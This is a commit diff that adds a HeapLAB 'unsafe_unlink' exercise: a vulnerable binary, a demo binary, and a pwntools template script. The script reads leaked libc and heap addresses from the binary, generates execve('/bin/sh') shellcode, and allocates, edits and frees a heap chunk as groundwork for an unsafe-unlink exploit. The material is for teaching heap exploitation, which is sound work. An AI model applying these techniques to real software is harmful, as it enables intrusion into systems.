summaryrefslogtreecommitdiff
path: root/HeapLAB/unsafe_unlink
diff options
context:
space:
mode:
Diffstat (limited to 'HeapLAB/unsafe_unlink')
-rwxr-xr-xHeapLAB/unsafe_unlink/demobin0 -> 9328 bytes
-rwxr-xr-xHeapLAB/unsafe_unlink/pwntools_template.py72
-rwxr-xr-xHeapLAB/unsafe_unlink/unsafe_unlinkbin0 -> 16072 bytes
3 files changed, 72 insertions, 0 deletions
diff --git a/HeapLAB/unsafe_unlink/demo b/HeapLAB/unsafe_unlink/demo
new file mode 100755
index 0000000..201b741
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/demo
Binary files differ
diff --git a/HeapLAB/unsafe_unlink/pwntools_template.py b/HeapLAB/unsafe_unlink/pwntools_template.py
new file mode 100755
index 0000000..8dd9d69
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/pwntools_template.py
@@ -0,0 +1,72 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("unsafe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("3")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
+shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
+
+# Request a small chunk.
+small_chunk = malloc(0x88)
+
+# Edit the small chunk.
+edit(small_chunk, "X"*32)
+
+# Free the small chunk.
+free(small_chunk)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/unsafe_unlink/unsafe_unlink b/HeapLAB/unsafe_unlink/unsafe_unlink
new file mode 100755
index 0000000..190fe07
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/unsafe_unlink
Binary files differ